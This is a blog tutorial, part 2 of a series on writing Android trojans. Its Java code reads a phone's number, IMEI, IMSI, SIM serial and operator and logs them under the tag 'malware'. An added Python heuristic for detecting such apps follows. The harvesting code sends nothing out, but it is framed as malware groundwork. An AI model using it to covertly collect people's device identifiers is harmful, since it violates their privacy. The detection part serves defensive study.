Apr 27 2013


After Part 1 we should have an app that runs on every boot. That's fine, but it does nothing yet. For Part 2, let's assume we want to get some information about the device and its current owner. We will retrieve the phone number from the SIM card, the SIM serial, the operator, the IMSI and the IMEI. This is really easy using the Android API. Just have a look at the methods we can use at http://developer.android.com/reference/android/telephony/TelephonyManager.html

Further, we will make use of the built-in log, which is also useful for debugging your app. Let's add a new class to the project and call it “PhoneInfo.java”. The first version of the code looks like this:

import android.app.Activity;
import android.content.Context;
import android.telephony.TelephonyManager;

public class PhoneInfo {

  public static String getMyPhoneNumber(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getLine1Number(); 
    }
    catch (Exception e) {
      return "";
    }
  }
}

Note the try/catch block! Some devices without a SIM would fail here, and we don’t want our application to show a nasty crash window to the user!

As you might have seen in the API description, we need another permission, so we add READ_PHONE_STATE to the permissions used in our manifest. Now we modify MainActivity.java to run this little method and see the output:

@Override
protected void onCreate(Bundle savedInstanceState) {
  super.onCreate(savedInstanceState);
  setContentView(R.layout.activity_main);

  Log.d("malware", "Call me anytime, my number is " + PhoneInfo.getMyPhoneNumber(this));
}

Note the usage of Log: the first string is the tag that will appear in the log, the second is the actual text you want to log. Since we wouldn’t log in a real-world app, I just called it malware here. If you run the above code on your device, you may see something along the lines of this in Eclipse:

[Screenshot: the log output shown in the Eclipse ADT window]

Now let's make heavy use of the nice API we have and read some more information. I will post the full code at the bottom to keep this readable, but here is what we do in MainActivity:

@Override
protected void onCreate(Bundle savedInstanceState) {
  super.onCreate(savedInstanceState);
  setContentView(R.layout.activity_main);

  Log.d("malware", "Number " + PhoneInfo.getMyPhoneNumber(this));
  Log.d("malware", "IMEI " + PhoneInfo.getMyIMEI(this));
  Log.d("malware", "IMSI " + PhoneInfo.getMyIMSI(this));
  Log.d("malware", "Network operator " + PhoneInfo.getMyNetworkOperator(this));
  Log.d("malware", "SIM-Serial " + PhoneInfo.getMySIMSerial(this));
  Log.d("malware", "Voice number " + PhoneInfo.getMyVoiceMailNumberI(this));
}

And this is what we get in our log:

[Screenshot: the log output shown in the DDMS view of Eclipse ADT]

And this is how the code for PhoneInfo.java looks at the end of part 2:

import android.app.Activity;
import android.content.Context;
import android.telephony.TelephonyManager;

public class PhoneInfo {

  public static String getMyPhoneNumber(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getLine1Number(); 
    }
    catch (Exception e) {
      return "";
    }
  }  
  public static String getMyIMEI(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getDeviceId(); 
    }
    catch (Exception e) {
      return "";
    }
  }  
  public static String getMyNetworkOperator(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getNetworkOperatorName(); 
    }
    catch (Exception e) {
      return "";
    }
  }

  public static String getMySIMSerial(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getSimSerialNumber(); 
    }
    catch (Exception e) {
      return "";
    }
  }
  public static String getMyIMSI(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getSubscriberId(); 
    }
    catch (Exception e) {
      return "";
    }
  }
  public static String getMyVoiceMailNumberI(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getVoiceMailNumber(); 
    }
    catch (Exception e) {
      return "";
    }
  }
}
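
The defender's view of what Parts 1 and 2 build, as an added example that is not part of the original tutorial: a static triage heuristic that flags an app which requests READ_PHONE_STATE, wraps the TelephonyManager identifier getters used above, and passes the results to Log. It assumes a manifest already decoded to text XML and Java-like source from a decompiler, and that Part 1's boot start appears as RECEIVE_BOOT_COMPLETED; the function names and sample strings are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# TelephonyManager getters from PhoneInfo.java that return persistent identifiers.
GETTERS = {"getDeviceId": "IMEI", "getSubscriberId": "IMSI",
           "getSimSerialNumber": "SIM serial", "getLine1Number": "phone number"}

def identifier_sources(java_src):
    """Map each method whose body calls a getter to the identifier it exposes."""
    sources, current = {}, None
    for line in java_src.splitlines():
        decl = re.search(r"\bString\s+(\w+)\s*\([^)]*\)\s*\{", line)
        current = decl.group(1) if decl else current
        for getter, label in GETTERS.items():
            if current and re.search(r"\." + getter + r"\s*\(", line):
                sources[current] = label
    return sources

def triage(manifest_xml, java_src):
    """Return findings, in the order found, for one decoded manifest plus source."""
    perms = {e.get(ANDROID_NS + "name")
             for e in ET.fromstring(manifest_xml).iter("uses-permission")}
    sources = identifier_sources(java_src)
    tainted = {**GETTERS, **sources}  # direct getter calls and wrapper methods
    findings = []
    if sources and "android.permission.READ_PHONE_STATE" in perms:
        findings.append("reads " + ", ".join(sorted(set(sources.values()))))
        if "android.permission.RECEIVE_BOOT_COMPLETED" in perms:
            findings.append("collects identifiers and starts at boot")
    for line in java_src.splitlines():
        if re.search(r"\bLog\.[vdiwe]\s*\(", line):
            for name, label in tainted.items():
                if re.search(r"\b" + name + r"\s*\(", line):
                    findings.append("writes " + label + " to logcat")
    return findings

# Constructed sample input; RECEIVE_BOOT_COMPLETED is assumed from Part 1's boot start.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
</manifest>"""
SOURCE = """public static String getMyIMEI(Activity a){
  return mTelephonyMgr.getDeviceId();
}
Log.d("malware", "IMEI " + PhoneInfo.getMyIMEI(this));
Log.d("malware", "Network operator " + PhoneInfo.getMyNetworkOperator(this));"""

print("\n".join(triage(MANIFEST, SOURCE)))
```

On Android 10 and later, getDeviceId, getSubscriberId and getSimSerialNumber require the privileged READ_PRIVILEGED_PHONE_STATE permission, so third-party apps can no longer read those values. The heuristic still flags the attempt, which is the signal a reviewer wants.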

  One Response to “Tutorial: Writing Android malware (trojans) Part 2”

  1. I want coding for malware detecting
